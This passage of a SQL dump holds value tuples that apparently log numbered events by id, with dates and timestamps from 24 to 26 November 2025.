03:48:51'),(96013,5457,1,'2025-11-24','2025-11-24 04:12:37'),(96014,4622,1,'2025-11-24','2025-11-24 04:23:21'),(96015,80,1,'2025-11-24','2025-11-24 04:35:52'),(96016,76,1,'2025-11-24','2025-11-24 04:40:28'),(96017,4733,1,'2025-11-24','2025-11-24 05:15:24'),(96018,106,1,'2025-11-24','2025-11-24 05:18:07'),(96019,5593,1,'2025-11-24','2025-11-24 06:01:22'),(96020,3680,1,'2025-11-24','2025-11-24 06:44:22'),(96021,4517,1,'2025-11-24','2025-11-24 07:00:33'),(96022,4950,1,'2025-11-24','2025-11-24 07:32:36'),(96023,2904,1,'2025-11-24','2025-11-24 07:33:37'),(96024,2904,1,'2025-11-24','2025-11-24 07:33:50'),(96025,1590,1,'2025-11-24','2025-11-24 08:19:06'),(96026,1590,1,'2025-11-24','2025-11-24 08:19:08'),(96027,3691,1,'2025-11-24','2025-11-24 09:17:15'),(96028,2804,1,'2025-11-24','2025-11-24 10:07:03'),(96029,3282,1,'2025-11-24','2025-11-24 10:56:06'),(96030,1582,1,'2025-11-24','2025-11-24 11:12:55'),(96031,3707,1,'2025-11-24','2025-11-24 11:21:36'),(96032,3498,1,'2025-11-24','2025-11-24 11:50:23'),(96033,3097,1,'2025-11-24','2025-11-24 12:00:30'),(96034,5353,1,'2025-11-24','2025-11-24 12:06:29'),(96035,4963,1,'2025-11-24','2025-11-24 12:13:17'),(96036,4874,1,'2025-11-24','2025-11-24 12:20:12'),(96037,1614,1,'2025-11-24','2025-11-24 12:37:54'),(96038,3285,1,'2025-11-24','2025-11-24 12:50:16'),(96039,91,1,'2025-11-24','2025-11-24 13:14:13'),(96040,4608,1,'2025-11-24','2025-11-24 14:17:49'),(96041,4950,1,'2025-11-24','2025-11-24 14:25:22'),(96042,3267,1,'2025-11-24','2025-11-24 14:28:06'),(96043,5522,1,'2025-11-24','2025-11-24 15:15:04'),(96044,5605,1,'2025-11-24','2025-11-24 16:10:14'),(96045,2704,1,'2025-11-24','2025-11-24 17:34:27'),(96046,2704,1,'2025-11-24','2025-11-24 17:39:39'),(96047,76,1,'2025-11-24','2025-11-24 17:42:26'),(96048,3083,1,'2025-11-24','2025-11-24 18:08:05'),(96049,2971,1,'2025-11-24','2025-11-24 18:12:02'),(96050,3307,1,'2025-11-24','2025-11-24 19:04:28'),(96051,2395,1,'2025-11-24','2025-11-24 19:54:12'),(96052,4963,1,'2025-11-24','2025-11-24 20:02:30'),(96053,3781,1,'2025-11-24','2025-11-24 20:10:54'),(96054,469,1,'2025-11-24','2025-11-24 20:37:55'),(96055,5397,1,'2025-11-24','2025-11-24 20:48:21'),(96056,5433,1,'2025-11-24','2025-11-24 21:27:22'),(96057,5512,1,'2025-11-24','2025-11-24 23:08:38'),(96058,2991,1,'2025-11-24','2025-11-24 23:30:06'),(96059,4950,1,'2025-11-24','2025-11-24 23:35:47'),(96060,4893,1,'2025-11-24','2025-11-24 23:47:03'),(96061,4556,1,'2025-11-24','2025-11-24 23:47:53'),(96062,4660,1,'2025-11-25','2025-11-25 00:03:57'),(96063,5454,1,'2025-11-25','2025-11-25 01:42:19'),(96064,477,1,'2025-11-25','2025-11-25 01:50:06'),(96065,5400,1,'2025-11-25','2025-11-25 02:52:47'),(96066,4529,1,'2025-11-25','2025-11-25 03:02:00'),(96067,5454,1,'2025-11-25','2025-11-25 04:38:19'),(96068,1544,1,'2025-11-25','2025-11-25 05:10:36'),(96069,3069,1,'2025-11-25','2025-11-25 05:23:25'),(96070,5374,1,'2025-11-25','2025-11-25 05:23:25'),(96071,1588,1,'2025-11-25','2025-11-25 05:28:43'),(96072,1604,1,'2025-11-25','2025-11-25 05:39:22'),(96073,3316,1,'2025-11-25','2025-11-25 05:54:24'),(96074,3664,1,'2025-11-25','2025-11-25 05:59:46'),(96075,3181,1,'2025-11-25','2025-11-25 06:00:50'),(96076,3482,1,'2025-11-25','2025-11-25 06:19:07'),(96077,486,1,'2025-11-25','2025-11-25 06:22:23'),(96078,5113,1,'2025-11-25','2025-11-25 06:38:07'),(96079,3079,1,'2025-11-25','2025-11-25 06:38:14'),(96080,4546,1,'2025-11-25','2025-11-25 06:38:21'),(96081,5631,1,'2025-11-25','2025-11-25 06:38:24'),(96082,3675,1,'2025-11-25','2025-11-25 06:38:30'),(96083,1695,1,'2025-11-25','2025-11-25 06:38:43'),(96084,2904,1,'2025-11-25','2025-11-25 06:38:46'),(96085,2150,1,'2025-11-25','2025-11-25 06:38:49'),(96086,5292,1,'2025-11-25','2025-11-25 06:38:55'),(96087,4703,1,'2025-11-25','2025-11-25 06:38:59'),(96088,4762,1,'2025-11-25','2025-11-25 06:39:04'),(96089,335,1,'2025-11-25','2025-11-25 06:39:10'),(96090,5301,1,'2025-11-25','2025-11-25 06:39:17'),(96091,5457,1,'2025-11-25','2025-11-25 06:39:29'),(96092,5499,1,'2025-11-25','2025-11-25 06:39:41'),(96093,3704,1,'2025-11-25','2025-11-25 06:39:51'),(96094,4681,1,'2025-11-25','2025-11-25 06:40:24'),(96095,2410,1,'2025-11-25','2025-11-25 06:40:34'),(96096,4827,1,'2025-11-25','2025-11-25 06:40:50'),(96097,5253,1,'2025-11-25','2025-11-25 06:40:53'),(96098,5536,1,'2025-11-25','2025-11-25 06:41:13'),(96099,3229,1,'2025-11-25','2025-11-25 06:41:14'),(96100,3053,1,'2025-11-25','2025-11-25 06:41:21'),(96101,5264,1,'2025-11-25','2025-11-25 06:41:29'),(96102,5409,1,'2025-11-25','2025-11-25 06:41:42'),(96103,469,1,'2025-11-25','2025-11-25 06:41:44'),(96104,3229,1,'2025-11-25','2025-11-25 06:41:47'),(96105,3053,1,'2025-11-25','2025-11-25 06:41:50'),(96106,110,1,'2025-11-25','2025-11-25 06:41:55'),(96107,4408,1,'2025-11-25','2025-11-25 06:42:02'),(96108,4738,1,'2025-11-25','2025-11-25 06:42:04'),(96109,4738,1,'2025-11-25','2025-11-25 06:42:06'),(96110,5346,1,'2025-11-25','2025-11-25 06:42:10'),(96111,4870,1,'2025-11-25','2025-11-25 06:42:17'),(96112,5492,1,'2025-11-25','2025-11-25 06:43:55'),(96113,5522,1,'2025-11-25','2025-11-25 06:44:10'),(96114,4963,1,'2025-11-25','2025-11-25 07:31:31'),(96115,3058,1,'2025-11-25','2025-11-25 08:11:22'),(96116,4612,1,'2025-11-25','2025-11-25 08:14:43'),(96117,3724,1,'2025-11-25','2025-11-25 08:15:43'),(96118,487,1,'2025-11-25','2025-11-25 08:32:04'),(96119,3034,1,'2025-11-25','2025-11-25 09:06:41'),(96120,1782,1,'2025-11-25','2025-11-25 09:07:02'),(96121,3027,1,'2025-11-25','2025-11-25 09:07:17'),(96122,4648,1,'2025-11-25','2025-11-25 09:07:32'),(96123,4911,1,'2025-11-25','2025-11-25 09:08:16'),(96124,2609,1,'2025-11-25','2025-11-25 09:08:25'),(96125,2165,1,'2025-11-25','2025-11-25 09:08:33'),(96126,4335,1,'2025-11-25','2025-11-25 09:08:37'),(96127,5425,1,'2025-11-25','2025-11-25 09:08:51'),(96128,1778,1,'2025-11-25','2025-11-25 09:08:53'),(96129,3051,1,'2025-11-25','2025-11-25 09:08:56'),(96130,4668,1,'2025-11-25','2025-11-25 09:09:01'),(96131,3259,1,'2025-11-25','2025-11-25 09:09:01'),(96132,5363,1,'2025-11-25','2025-11-25 09:09:05'),(96133,2296,1,'2025-11-25','2025-11-25 09:09:10'),(96134,3746,1,'2025-11-25','2025-11-25 09:09:12'),(96135,1720,1,'2025-11-25','2025-11-25 09:09:14'),(96136,5310,1,'2025-11-25','2025-11-25 09:09:19'),(96137,4363,1,'2025-11-25','2025-11-25 09:09:24'),(96138,5310,1,'2025-11-25','2025-11-25 09:09:28'),(96139,4645,1,'2025-11-25','2025-11-25 09:09:30'),(96140,1604,1,'2025-11-25','2025-11-25 09:09:41'),(96141,3664,1,'2025-11-25','2025-11-25 09:09:42'),(96142,474,1,'2025-11-25','2025-11-25 09:09:50'),(96143,3774,1,'2025-11-25','2025-11-25 09:09:58'),(96144,5507,1,'2025-11-25','2025-11-25 09:10:01'),(96145,4744,1,'2025-11-25','2025-11-25 09:10:02'),(96146,4950,1,'2025-11-25','2025-11-25 09:10:27'),(96147,4677,1,'2025-11-25','2025-11-25 09:10:30'),(96148,5131,1,'2025-11-25','2025-11-25 09:10:35'),(96149,5268,1,'2025-11-25','2025-11-25 09:10:41'),(96150,87,1,'2025-11-25','2025-11-25 09:10:48'),(96151,84,1,'2025-11-25','2025-11-25 09:10:53'),(96152,3056,1,'2025-11-25','2025-11-25 09:10:55'),(96153,2152,1,'2025-11-25','2025-11-25 09:11:03'),(96154,1766,1,'2025-11-25','2025-11-25 09:11:48'),(96155,4938,1,'2025-11-25','2025-11-25 09:16:57'),(96156,4722,1,'2025-11-25','2025-11-25 09:29:45'),(96157,1582,1,'2025-11-25','2025-11-25 09:31:47'),(96158,4866,1,'2025-11-25','2025-11-25 10:20:25'),(96159,1737,1,'2025-11-25','2025-11-25 10:28:14'),(96160,5609,1,'2025-11-25','2025-11-25 10:28:14'),(96161,68,1,'2025-11-25','2025-11-25 10:37:00'),(96162,80,1,'2025-11-25','2025-11-25 10:38:14'),(96163,68,1,'2025-11-25','2025-11-25 10:39:39'),(96164,5400,1,'2025-11-25','2025-11-25 10:43:40'),(96165,4768,1,'2025-11-25','2025-11-25 10:43:40'),(96166,487,1,'2025-11-25','2025-11-25 10:45:47'),(96167,89,1,'2025-11-25','2025-11-25 10:46:44'),(96168,91,1,'2025-11-25','2025-11-25 10:47:34'),(96169,91,1,'2025-11-25','2025-11-25 10:47:52'),(96170,72,1,'2025-11-25','2025-11-25 10:50:30'),(96171,1870,1,'2025-11-25','2025-11-25 10:53:18'),(96172,84,1,'2025-11-25','2025-11-25 10:59:55'),(96173,68,1,'2025-11-25','2025-11-25 11:00:48'),(96174,76,1,'2025-11-25','2025-11-25 11:01:32'),(96175,2503,1,'2025-11-25','2025-11-25 11:02:02'),(96176,108,1,'2025-11-25','2025-11-25 11:02:12'),(96177,80,1,'2025-11-25','2025-11-25 11:03:27'),(96178,80,1,'2025-11-25','2025-11-25 11:04:12'),(96179,80,1,'2025-11-25','2025-11-25 11:04:32'),(96180,76,1,'2025-11-25','2025-11-25 11:07:47'),(96181,89,1,'2025-11-25','2025-11-25 11:11:04'),(96182,4930,1,'2025-11-25','2025-11-25 11:11:41'),(96183,89,1,'2025-11-25','2025-11-25 11:12:00'),(96184,87,1,'2025-11-25','2025-11-25 11:34:27'),(96185,89,1,'2025-11-25','2025-11-25 11:35:35'),(96186,89,1,'2025-11-25','2025-11-25 11:39:58'),(96187,89,1,'2025-11-25','2025-11-25 11:40:11'),(96188,2704,1,'2025-11-25','2025-11-25 11:40:28'),(96189,1606,1,'2025-11-25','2025-11-25 11:40:36'),(96190,89,1,'2025-11-25','2025-11-25 11:41:36'),(96191,89,1,'2025-11-25','2025-11-25 11:42:38'),(96192,5163,1,'2025-11-25','2025-11-25 11:43:01'),(96193,4660,1,'2025-11-25','2025-11-25 11:53:32'),(96194,5406,1,'2025-11-25','2025-11-25 12:02:57'),(96195,1697,1,'2025-11-25','2025-11-25 12:13:43'),(96196,4639,1,'2025-11-25','2025-11-25 12:13:45'),(96197,2965,1,'2025-11-25','2025-11-25 12:13:53'),(96198,4963,1,'2025-11-25','2025-11-25 12:13:56'),(96199,1728,1,'2025-11-25','2025-11-25 12:14:01'),(96200,5028,1,'2025-11-25','2025-11-25 12:14:06'),(96201,1741,1,'2025-11-25','2025-11-25 12:14:09'),(96202,4514,1,'2025-11-25','2025-11-25 12:14:21'),(96203,2063,1,'2025-11-25','2025-11-25 12:14:23'),(96204,2658,1,'2025-11-25','2025-11-25 12:14:32'),(96205,3710,1,'2025-11-25','2025-11-25 12:14:38'),(96206,5530,1,'2025-11-25','2025-11-25 12:14:45'),(96207,4357,1,'2025-11-25','2025-11-25 12:15:09'),(96208,3273,1,'2025-11-25','2025-11-25 12:15:23'),(96209,1741,1,'2025-11-25','2025-11-25 12:15:28'),(96210,1741,1,'2025-11-25','2025-11-25 12:15:36'),(96211,1745,1,'2025-11-25','2025-11-25 12:16:30'),(96212,108,1,'2025-11-25','2025-11-25 12:25:38'),(96213,4792,1,'2025-11-25','2025-11-25 12:38:13'),(96214,1770,1,'2025-11-25','2025-11-25 12:52:05'),(96215,5605,1,'2025-11-25','2025-11-25 12:52:54'),(96216,91,1,'2025-11-25','2025-11-25 13:20:37'),(96217,3707,1,'2025-11-25','2025-11-25 13:24:43'),(96218,5326,1,'2025-11-25','2025-11-25 13:24:43'),(96219,5326,1,'2025-11-25','2025-11-25 13:25:54'),(96220,89,1,'2025-11-25','2025-11-25 13:33:20'),(96221,1608,1,'2025-11-25','2025-11-25 13:33:57'),(96222,76,1,'2025-11-25','2025-11-25 13:35:42'),(96223,76,1,'2025-11-25','2025-11-25 14:05:22'),(96224,5428,1,'2025-11-25','2025-11-25 14:18:09'),(96225,72,1,'2025-11-25','2025-11-25 14:23:24'),(96226,3271,1,'2025-11-25','2025-11-25 14:26:10'),(96227,5409,1,'2025-11-25','2025-11-25 14:37:03'),(96228,3714,1,'2025-11-25','2025-11-25 14:50:27'),(96229,5125,1,'2025-11-25','2025-11-25 15:01:43'),(96230,1588,1,'2025-11-25','2025-11-25 15:02:45'),(96231,4950,1,'2025-11-25','2025-11-25 15:12:06'),(96232,4950,1,'2025-11-25','2025-11-25 15:14:04'),(96233,4950,1,'2025-11-25','2025-11-25 15:23:51'),(96234,108,1,'2025-11-25','2025-11-25 15:31:16'),(96235,4338,1,'2025-11-25','2025-11-25 16:14:53'),(96236,3789,1,'2025-11-25','2025-11-25 16:16:04'),(96237,4950,1,'2025-11-25','2025-11-25 16:19:15'),(96238,4950,1,'2025-11-25','2025-11-25 16:43:55'),(96239,5567,1,'2025-11-25','2025-11-25 17:03:55'),(96240,4837,1,'2025-11-25','2025-11-25 17:23:05'),(96241,4524,1,'2025-11-25','2025-11-25 17:24:12'),(96242,3541,1,'2025-11-25','2025-11-25 18:16:38'),(96243,1695,1,'2025-11-25','2025-11-25 18:17:46'),(96244,3282,1,'2025-11-25','2025-11-25 18:21:07'),(96245,5264,1,'2025-11-25','2025-11-25 18:21:08'),(96246,5264,1,'2025-11-25','2025-11-25 18:22:15'),(96247,3045,1,'2025-11-25','2025-11-25 18:32:19'),(96248,5570,1,'2025-11-25','2025-11-25 19:10:33'),(96249,2252,1,'2025-11-25','2025-11-25 19:10:37'),(96250,4717,1,'2025-11-25','2025-11-25 19:12:47'),(96251,1709,1,'2025-11-25','2025-11-25 19:12:49'),(96252,1582,1,'2025-11-25','2025-11-25 20:43:14'),(96253,2309,1,'2025-11-25','2025-11-25 21:22:44'),(96254,5397,1,'2025-11-25','2025-11-25 21:46:33'),(96255,5436,1,'2025-11-25','2025-11-25 21:59:06'),(96256,5449,1,'2025-11-25','2025-11-25 22:01:11'),(96257,4950,1,'2025-11-25','2025-11-25 22:04:01'),(96258,5515,1,'2025-11-25','2025-11-25 22:07:25'),(96259,72,1,'2025-11-25','2025-11-25 22:11:37'),(96260,1877,1,'2025-11-25','2025-11-25 22:32:53'),(96261,5622,1,'2025-11-25','2025-11-25 22:35:05'),(96262,3127,1,'2025-11-25','2025-11-25 22:46:17'),(96263,4404,1,'2025-11-26','2025-11-26 00:14:12'),(96264,1600,1,'2025-11-26','2025-11-26 00:18:21'),(96265,4983,1,'2025-11-26','2025-11-26 00:19:20'),(96266,5356,1,'2025-11-26','2025-11-26 01:09:04'),(96267,1588,1,'2025-11-26','2025-11-26 01:23:58'),(96268,5598,1,'2025-11-26','2025-11-26 01:31:22'),(96269,1766,1,'2025-11-26','2025-11-26 02:03:26'),(96270,87,1,'2025-11-26','2025-11-26 02:10:05'),(96271,5605,1,'2025-11-26','2025-11-26 02:12:48'),(96272,485,1,'2025-11-26','2025-11-26 02:13:50'),(96273,4802,1,'2025-11-26','2025-11-26 02:14:51'),(96274,4950,1,'2025-11-26','2025-11-26 02:15:52'),(96275,91,1,'2025-11-26','2025-11-26 02:40:39'),(96276,5492,1,'2025-11-26','2025-11-26 03:00:50'),(96277,470,1,'2025-11-26','2025-11-26 03:11:02'),(96278,5454,1,'2025-11-26','2025-11-26 04:20:48'),(96279,1590,1,'2025-11-26','2025-11-26 04:31:31'),(96280,2956,1,'2025-11-26','2025-11-26 04:31:34'),(96281,5005,1,'2025-11-26','2025-11-26 04:32:36'),(96282,3079,1,'2025-11-26','2025-11-26 04:33:39'),(96283,5005,1,'2025-11-26','2025-11-26 04:33:41'),(96284,3102,1,'2025-11-26','2025-11-26 04:35:50'),(96285,5400,1,'2025-11-26','2025-11-26 04:53:59'),(96286,5582,1,'2025-11-26','2025-11-26 05:04:27'),(96287,4741,1,'2025-11-26','2025-11-26 05:14:52'),(96288,4529,1,'2025-11-26','2025-11-26 05:15:48'),(96289,4681,1,'2025-11-26','2025-11-26 05:17:52'),(96290,5415,1,'2025-11-26','2025-11-26 05:26:09'),(96291,5295,1,'2025-11-26','2025-11-26 05:26:10'),(96292,5415,1,'2025-11-26','2025-11-26 05:27:12'),(96293,5295,1,'2025-11-26','2025-11-26 05:27:12'),(96294,4762,1,'2025-11-26','2025-11-26 05:28:14'),(96295,4363,1,'2025-11-26','2025-11-26 05:32:19'),(96296,5406,1,'2025-11-26','2025-11-26 05:32:19'),(96297,1596,1,'2025-11-26','2025-11-26 05:34:21'),(96298,3787,1,'2025-11-26','2025-11-26 05:38:28'),(96299,4573,1,'2025-11-26','2025-11-26 05:43:38'),(96300,4573,1,'2025-11-26','2025-11-26 05:45:38'),(96301,5334,1,'2025-11-26','2025-11-26 06:24:34'),(96302,5626,1,'2025-11-26','2025-11-26 06:25:32'),(96303,5626,1,'2025-11-26','2025-11-26 06:26:35'),(96304,4779,1,'2025-11-26','2025-11-26 06:27:39'),(96305,4569,1,'2025-11-26','2025-11-26 06:29:41'),(96306,1774,1,'2025-11-26','2025-11-26 06:29:42'),(96307,4569,1,'2025-11-26','2025-11-26 06:30:42'),(96308,5050,1,'2025-11-26','2025-11-26 06:39:58'),(96309,1734,1,'2025-11-26','2025-11-26 06:40:58'),(96310,4363,1,'2025-11-26','2025-11-26 06:52:27'),(96311,4712,1,'2025-11-26','2025-11-26 06:57:27'),(96312,5317,1,'2025-11-26','2025-11-26 07:08:42'),(96313,3290,1,'2025-11-26','2025-11-26 07:10:44'),(96314,3698,1,'2025-11-26','2025-11-26 07:11:50'),(96315,3673,1,'2025-11-26','2025-11-26 07:12:51'),(96316,3278,1,'2025-11-26','2025-11-26 08:24:15'),(96317,74,1,'2025-11-26','2025-11-26 08:24:16'),(96318,4747,1,'2025-11-26','2025-11-26 08:25:17'),(96319,4485,1,'2025-11-26','2025-11-26 08:26:21'),(96320,3117,1,'2025-11-26','2025-11-26 08:26:25'),(96321,4485,1,'2025-11-26','2025-11-26 08:27:21'),(96322,5467,1,'2025-11-26','2025-11-26 08:27:21'),(96323,4357,1,'2025-11-26','2025-11-26 08:28:29'),(96324,5578,1,'2025-11-26','2025-11-26 08:41:46'),(96325,1608,1,'2025-11-26','2025-11-26 08:43:49'),(96326,5157,1,'2025-11-26','2025-11-26 08:50:08'),(96327,5080,1,'2025-11-26','2025-11-26 08:50:11'),(96328,5076,1,'2025-11-26','2025-11-26 08:52:10'),(96329,5157,1,'2025-11-26','2025-11-26 08:52:14'),(96330,5080,1,'2025-11-26','2025-11-26 08:53:12'),(96331,102,1,'2025-11-26','2025-11-26 08:56:13'),(96332,4694,1,'2025-11-26','2025-11-26 09:07:27'),(96333,3083,1,'2025-11-26','2025-11-26 09:08:27'),(96334,1697,1,'2025-11-26','2025-11-26 09:08:28'),(96335,2993,1,'2025-11-26','2025-11-26 09:08:30'),(96336,4703,1,'2025-11-26','2025-11-26 09:08:31'),(96337,472,1,'2025-11-26','2025-11-26 09:09:26'),(96338,5518,1,'2025-11-26','2025-11-26 09:09:26'),(96339,4377,1,'2025-11-26','2025-11-26 09:09:28'),(96340,4498,1,'2025-11-26','2025-11-26 09:09:36'),(96341,4400,1,'2025-11-26','2025-11-26 09:10:27'),(96342,1608,1,'2025-11-26','2025-11-26 09:10:32'),(96343,5397,1,'2025-11-26','2025-11-26 09:56:31'),(96344,5397,1,'2025-11-26','2025-11-26 09:57:53'),(96345,5489,1,'2025-11-26','2025-11-26 09:59:27'),(96346,4722,1,'2025-11-26','2025-11-26 10:07:37'),(96347,4520,1,'2025-11-26','2025-11-26 10:07:46'),(96348,4645,1,'2025-11-26','2025-11-26 10:07:51'),(96349,5578,1,'2025-11-26','2025-11-26 10:08:46'),(96350,1768,1,'2025-11-26','2025-11-26 10:08:47'),(96351,3738,1,'2025-11-26','2025-11-26 10:08:48'),(96352,1870,1,'2025-11-26','2025-11-26 10:08:48'),(96353,3674,1,'2025-11-26','2025-11-26 10:08:52'),(96354,4722,1,'2025-11-26','2025-11-26 10:09:14'),(96355,2964,1,'2025-11-26','2025-11-26 10:09:46'),(96356,5412,1,'2025-11-26','2025-11-26 10:09:48'),(96357,5412,1,'2025-11-26','2025-11-26 10:11:37'),(96358,3117,1,'2025-11-26','2025-11-26 10:43:49'),(96359,2904,1,'2025-11-26','2025-11-26 10:54:29'),(96360,2293,1,'2025-11-26','2025-11-26 11:06:01'),(96361,4546,1,'2025-11-26','2025-11-26 11:06:01'),(96362,4674,1,'2025-11-26','2025-11-26 11:07:10'),(96363,5163,1,'2025-11-26','2025-11-26 11:07:10'),(96364,4776,1,'2025-11-26','2025-11-26 11:07:13'),(96365,68,1,'2025-11-26','2025-11-26 11:07:15'),(96366,4489,1,'2025-11-26','2025-11-26 11:08:05'),(96367,5461,1,'2025-11-26','2025-11-26 11:08:08'),(96368,5522,1,'2025-11-26','2025-11-26 11:09:13'),(96369,5631,1,'2025-11-26','2025-11-26 11:12:47'),(96370,5631,1,'2025-11-26','2025-11-26 11:19:47'),(96371,5631,1,'2025-11-26','2025-11-26 11:19:49'),(96372,5409,1,'2025-11-26','2025-11-26 11:26:55'),(96373,5561,1,'2025-11-26','2025-11-26 11:37:17'),(96374,5441,1,'2025-11-26','2025-11-26 11:48:33'),(96375,1718,1,'2025-11-26','2025-11-26 12:05:24'),(96376,1780,1,'2025-11-26','2025-11-26 12:06:53'),(96377,5492,1,'2025-11-26','2025-11-26 12:08:57'),(96378,2617,1,'2025-11-26','2025-11-26 12:10:01'),(96379,1602,1,'2025-11-26','2025-11-26 12:10:03'),(96380,4448,1,'2025-11-26','2025-11-26 12:10:05'),(96381,1586,1,'2025-11-26','2025-11-26 12:11:03'),(96382,1734,1,'2025-11-26','2025-11-26 12:40:30'),(96383,1604,1,'2025-11-26','2025-11-26 12:42:58'),(96384,91,1,'2025-11-26','2025-11-26 12:50:54'),(96385,3243,1,'2025-11-26','2025-11-26 13:20:24'),(96386,4688,1,'2025-11-26','2025-11-26 13:37:50'),(96387,5119,1,'2025-11-26','2025-11-26 13:44:02'),(96388,3045,1,'2025-11-26','2025-11-26 13:46:03'),(96389,2419,1,'2025-11-26','2025-11-26 13:46:07'),(96390,4765,1,'2025-11-26','2025-11-26 13:46:07'),(96391,68,1,'2025-11-26','2025-11-26 13:55:35'),(96392,4681,1,'2025-11-26','2025-11-26 14:10:29'),(96393,3771,1,'2025-11-26','2025-11-26 14:11:31'),(96394,4510,1,'2025-11-26','2025-11-26 14:11:32'),(96395,5071,1,'2025-11-26','2025-11-26 14:11:32'),(96396,2309,1,'2025-11-26','2025-11-26 14:11:32'),(96397,5561,1,'2025-11-26','2025-11-26 14:11:34'),(96398,4635,1,'2025-11-26','2025-11-26 14:11:34'),(96399,3307,1,'2025-11-26','2025-11-26 14:12:31'),(96400,2748,1,'2025-11-26','2025-11-26 14:12:31'),(96401,5071,1,'2025-11-26','2025-11-26 14:12:31'),(96402,4966,1,'2025-11-26','2025-11-26 14:12:32'),(96403,4373,1,'2025-11-26','2025-11-26 14:12:33'),(96404,4635,1,'2025-11-26','2025-11-26 14:12:33'),(96405,4966,1,'2025-11-26','2025-11-26 14:13:32'),(96406,68,1,'2025-11-26','2025-11-26 14:59:34'),(96407,4977,1,'2025-11-26','2025-11-26 15:07:40'),(96408,3006,1,'2025-11-26','2025-11-26 15:10:50'),(96409,3023,1,'2025-11-26','2025-11-26 15:10:50'),(96410,470,1,'2025-11-26','2025-11-26 15:29:33'),(96411,1720,1,'2025-11-26','2025-11-26 16:06:56'),(96412,1594,1,'2025-11-26','2025-11-26 16:07:57'),(96413,4556,1,'2025-11-26','2025-11-26 16:10:02'),(96414,5330,1,'2025-11-26','2025-11-26 16:10:02'),(96415,3706,1,'2025-11-26','2025-11-26 16:11:06'),(96416,5330,1,'2025-11-26','2025-11-26 16:11:08'),(96417,5433,1,'2025-11-26','2025-11-26 16:44:56'),(96418,1737,1,'2025-11-26','2025-11-26 16:57:32'),(96419,5449,1,'2025-11-26','2025-11-26 16:59:48'),(96420,5420,1,'2025-11-26','2025-11-26 17:09:45'),(96421,3269,1,'2025-11-26','2025-11-26 17:09:45'),(96422,4329,1,'2025-11-26','2025-11-26 17:09:50'),(96423,3267,1,'2025-11-26','2025-11-26 17:09:53'),(96424,3275,1,'2025-11-26','2025-11-26 17:11:07'),(96425,2297,1,'2025-11-26','2025-11-26 17:11:10'),(96426,5502,1,'2025-11-26','2025-11-26 17:11:13'),(96427,4797,1,'2025-11-26','2025-11-26 17:11:20'),(96428,4582,1,'2025-11-26','2025-11-26 17:12:02'),(96429,1612,1,'2025-11-26','2025-11-26 17:12:05'),(96430,3051,1,'2025-11-26','2025-11-26 17:12:12'),(96431,5436,1,'2025-11-26','2025-11-26 17:13:19'),(96432,1544,1,'2025-11-26','2025-11-26 17:16:57'),(96433,4966,1,'2025-11-26','2025-11-26 17:21:33'),(96434,3034,1,'2025-11-26','2025-11-26 17:34:29'),(96435,5502,1,'2025-11-26','2025-11-26 17:56:48'),(96436,4416,1,'2025-11-26','2025-11-26 17:59:12'),(96437,3307,1,'2025-11-26','2025-11-26 18:00:10'),(96438,4983,1,'2025-11-26','2025-11-26 18:10:24'),(96439,1705,1,'2025-11-26','2025-11-26 18:10:30'),(96440,5428,1,'2025-11-26','2025-11-26 18:10:36'),(96441,3072,1,'2025-11-26','2025-11-26 18:10:40'),(96442,4983,1,'2025-11-26','2025-11-26 18:11:48'),(96443,4424,1,'2025-11-26','2025-11-26 18:13:50'),(96444,3041,1,'2025-11-26','2025-11-26 18:14:56'),(96445,5441,1,'2025-11-26','2025-11-26 18:17:12'),(96446,4432,1,'2025-11-26','2025-11-26 18:17:13'),(96447,5553,1,'2025-11-26','2025-11-26 18:18:22'),(96448,2178,1,'2025-11-26','2025-11-26 18:24:02'),(96449,1782,1,'2025-11-26','2025-11-26 18:26:20'),(96450,3781,1,'2025-11-26','2025-11-26 18:46:32'),(96451,3069,1,'2025-11-26','2025-11-26 18:54:22'),(96452,3486,1,'2025-11-26','2025-11-26 18:59:57'),(96453,4436,1,'2025-11-26','2025-11-26 19:10:05'),(96454,5433,1,'2025-11-26','2025-11-26 19:20:08'),(96455,477,1,'2025-11-26','2025-11-26 19:31:39'),(96456,477,1,'2025-11-26','2025-11-26 19:33:55'),(96457,5109,1,'2025-11-26','2025-11-26 19:33:58'),(96458,5492,1,'2025-11-26','2025-11-26 19:35:01'),(96459,3253,1,'2025-11-26','2025-11-26 19:35:06'),(96460,4944,1,'2025-11-26','2025-11-26 19:36:12'),(96461,4944,1,'2025-11-26','2025-11-26 19:37:17'),(96462,5109,1,'2025-11-26','2025-11-26 19:39:35'),(96463,5573,1,'2025-11-26','2025-11-26 20:05:08'),(96464,3247,1,'2025-11-26','2025-11-26 20:10:36'),(96465,5346,1,'2025-11-26','2025-11-26 20:24:54'),(96466,3180,1,'2025-11-26','2025-11-26 20:24:57'),(96467,2965,1,'2025-11-26','2025-11-26 20:27:06'),(96468,3261,1,'2025-11-26','2025-11-26 20:27:06'),(96469,481,1,'2025-11-26','2025-11-26 20:27:10'),(96470,5507,1,'2025-11-26','2025-11-26 20:27:13'),(96471,4750,1,'2025-11-26','2025-11-26 20:28:09'),(96472,5346,1,'2025-11-26','2025-11-26 20:28:11'),(96473,3287,1,'2025-11-26','2025-11-26 20:28:13'),(96474,5289,1,'2025-11-26','2025-11-26 20:30:20'),(96475,2751,1,'2025-11-26','2025-11-26 20:30:21'),(96476,4681,1,'2025-11-26','2025-11-26 20:49:38'),(96477,5512,1,'2025-11-26','2025-11-26 20:54:55'),(96478,5457,1,'2025-11-26','2025-11-26 20:55:58'),(96479,4660,1,'2025-11-26','2025-11-26 21:09:41'),(96480,4612,1,'2025-11-26','2025-11-26 21:09:50'),(96481,5570,1,'2025-11-26','2025-11-26 21:13:59'),(96482,4440,1,'2025-11-26','2025-11-26 21:26:52'),(96483,5153,1,'2025-11-26','2025-11-26 21:30:00'),(96484,5454,1,'2025-11-26','2025-11-26 21:31:01'),(96485,5153,1,'2025-11-26','2025-11-26 21:31:03'),(96486,5397,1,'2025-11-26','2025-11-26 21:56:38'),(96487,3079,1,'2025-11-26','2025-11-26 21:58:28'),(96488,5425,1,'2025-11-26','2025-11-26 22:04:23'),(96489,3096,1,'2025-11-26','2025-11-26 22:10:38'),(96490,4719,1,'2025-11-26','2025-11-26 22:12:48'),(96491,5636,1,'2025-11-26','2025-11-26 22:25:33'),(96492,5636,1,'2025-11-26','2025-11-26 22:26:44'),(96493,3273,1,'2025-11-26','2025-11-26 22:33:20'),(96494,3430,1,'2025-11-26','2025-11-26 22:35:39'),(96495,4888,1,'2025-11-26','2025-11-26 22:39:06'),(96496,4697,1,'2025-11-26','2025-11-26 22:39:11'),(96497,2911,1,'2025-11-26','2025-11-26 